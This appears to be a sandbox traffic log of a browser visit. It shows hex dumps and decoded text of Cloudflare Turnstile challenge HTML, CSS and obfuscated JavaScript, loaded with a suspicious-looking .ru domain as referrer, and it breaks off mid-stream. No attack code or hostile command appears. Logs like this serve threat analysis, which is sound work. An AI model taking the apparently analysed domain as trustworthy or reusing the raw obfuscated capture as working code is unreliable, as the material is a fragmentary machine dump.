                                                                      Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                      Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                      Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.1649727104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:10 UTC793OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/ HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-Dest: iframe
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:10 UTC1362INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 26636
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                      cross-origin-embedder-policy: require-corp
                                                                      cross-origin-opener-policy: same-origin
                                                                      cross-origin-resource-policy: cross-origin
                                                                      origin-agent-cluster: ?1
                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                      referrer-policy: same-origin
                                                                      document-policy: js-profiling
                                                                      2025-01-07 08:27:10 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 32 39 31 32 65 66 39 39 34 37 63 65 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                      Data Ascii: Server: cloudflareCF-RAY: 8fe2912ef9947ce2-EWRalt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:10 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                      Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                      Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                      Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                      Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                      Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                      Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                      Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                      2025-01-07 08:27:10 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                      Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.1649728104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:11 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2912ef9947ce2&lang=auto HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:11 UTC331INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:11 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 115777
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29132eb004223-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:11 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 69 6d 65
                                                                      Data Ascii: if%20this%20problem%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","human_button_text":"Verify%20you%20are%20human","turnstile_overrun_description":"Stuck%20here%3F","turnstile_success":"Success%21","time
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 67 68 2c 67 73 2c 67 77 2c 67 78 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 5a 2c 66 30 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 35 38 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 38 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 32 34 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 31 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 30 34 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 65 33 29
                                                                      Data Ascii: gh,gs,gw,gx,gB,gC,gG,gH,eZ,f0){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(135))/1*(-parseInt(gI(138))/2)+parseInt(gI(1058))/3+-parseInt(gI(108))/4*(-parseInt(gI(424))/5)+parseInt(gI(951))/6+parseInt(gI(504))/7+parseInt(gI(1e3)
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 28 69 29 7d 2c 27 75 77 70 6a 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 58 57 71 56 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 55 4b 6b 6d 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 64 48 73 48 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 76 4d 71 76 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 49 58 4e 6f 56 27 3a 67 4b 28 36 39 35 29 2c 27 70 57 57 49 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4a 59 52 65 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                      Data Ascii: (i)},'uwpjZ':function(h,i){return h&i},'XWqVd':function(h,i){return h(i)},'UKkme':function(h,i){return i!=h},'dHsHL':function(h,i){return h&i},'vMqve':function(h,i){return h*i},'IXNoV':gK(695),'pWWIk':function(h,i){return h<i},'JYReQ':function(h,i){return
                                                                      2025-01-07 08:27:11 UTC1369INData Raw: 67 4e 28 36 33 36 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 4e 28 33 33 32 29 5d 28 64 5b 67 4e 28 31 30 39 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 4e 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 4e 28 33 33 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 4e 28 38 36 35 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 67 4e 28 35 32 36 29 5d 28 49 2c 31 29 7c 4e 26 31 2e 37 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 4e 28 33 33 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64
